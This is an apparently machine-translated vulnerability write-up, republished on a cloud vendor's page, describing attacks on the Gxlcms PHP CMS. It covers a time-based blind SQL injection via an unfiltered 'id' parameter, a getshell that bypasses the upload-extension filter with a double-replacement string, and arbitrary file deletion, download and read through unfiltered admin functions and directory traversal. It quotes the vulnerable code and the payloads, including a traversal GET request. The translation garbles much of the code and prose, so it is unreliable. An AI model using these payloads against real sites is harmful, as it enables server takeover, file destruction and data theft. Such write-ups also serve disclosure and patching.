Gxlcms time Blind + background Any file delete read download +getshell

Source: Internet
Author: User

Foreground SQL Time Blind

At the front desk work rating

Lib\home\action/commaction. class. php

Line 56th

        $ting _id $_get ["id"];

Line 133th

            $ting _gold $mod->where ("ting_id= '$ting _id'")->getfield ("Ting_gold");

resulting in a time blind due to ambiguous echoes

Backstage Getshell

Background attachment settings

Fuzz Process input PHP is filtered to empty so phphpp will become PHP after submission

Track to \lib\admin\action\adminaction.class.php

$config Trim (str_replace(arraystrtolower($config["Upload_class"]), ",");

Grab the bag, track it, find the same action.

$upload _class Str_replace (arraystrtolower(C ("Upload_class"));         Var_dump (strtolower(C ("Upload_class")));

The place of the attachment configuration is replaced once and then written into the config.php here from the config.php to be read out of the time to replace it, so in the place of the attachment set up a plan to construct a two-time replacement is the PHP suffix

I'm using ptxtptxthtxtptxthtxtp here.

Replacement is pphphp

Replacement twice is PHP

Delete any files in the background

Where template files are managed and where the database is restored

    Public functiondel () {$id= Admin_gxl_url_repalce (Str_replace(‘*‘,‘.‘,Trim($_get[' ID ']))); //Die ($id);        if(!substr(sprintf("%o",fileperms($id)),-3)){            $this->error (' No delete permission! ‘); }        @unlink($id); if(!Empty($_session[' Template_jumpurl '])) {            $this->assign ("Jumpurl",$_session[' Template_jumpurl ']); }Else{            $this->assign ("Jumpurl", '? S=admin/template/show ')); }        $this->success (' Delete file succeeded! ‘); }

No filtering can delete any file

Download any File

Get/index.php?s=admin-data-down-id-20170805_2978_1.sql http/1.1

     Public functionDown () {$filepath= Data_path. ' _bak/'.$_get[' ID ']; //Die ($filepath);        if(file_exists($filepath)) {            $filename=$filename?$filename:basename($filepath); $filetype=Trim(substr(STRRCHR($filename, '. '), 1)); $filesize=filesize($filepath); Header(' cache-control:max-age=31536000 '); Header(' Expires: '.gmdate(' d, D M Y h:i:s ', Time() + 31536000). ' GMT '); Header(' Content-encoding:none '); Header(' Content-length: '.$filesize); Header(' Content-disposition:attachment; Filename= '.$filename); Header(' Content-type: '.$filetype); ReadFile($filepath); Exit; }Else{            $this->error (' Error, no sub-volume file found! ‘); }    }

There is still no filter structure when using \ \. \\.. \ \ Cross Directory

Arbitrary file read

Background to add ads to the place to grab the bag

    //Post-Operation     Public function_after_insert () {$array=$_post; Var_dump($array); //Die ('./'. C (' Admin_ads_file '). ' /'. $array [' Ads_name ']. '. JS ');Write_file ('./'. C (' Admin_ads_file '). ' /‘.$array[' Ads_name ']. JS ', T2js (stripslashes(Trim($array[' Ads_content '])))); $this->success (' Add AD bit success! ‘); }

There is no filter to write JS files in the Template\gxlcms directory

Edit point edits where template management is available

     Public functionAdd () {$filename= Admin_gxl_url_repalce (Str_replace(‘*‘,‘.‘,Trim($_get[' ID ']))); if(Empty($filename)) {            $this->error (' template name cannot be empty! ‘); }        $content= Read_file ($filename); $this->assign (' filename ',$filename); $this->assign (' content ',Htmlspecialchars($content)); 

You can jump to the directory to read any file, but it's a pity that he's dead. Only the files in the whitelist can be modified so they can't be getshell.

Attempt to generate tt/2.js and then Access TT cannot be directory traversal

Download any File

This is the same as the reason for the formation of the above, no filtration.

Gxlcms time Blind + background Any file delete read download +getshell

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.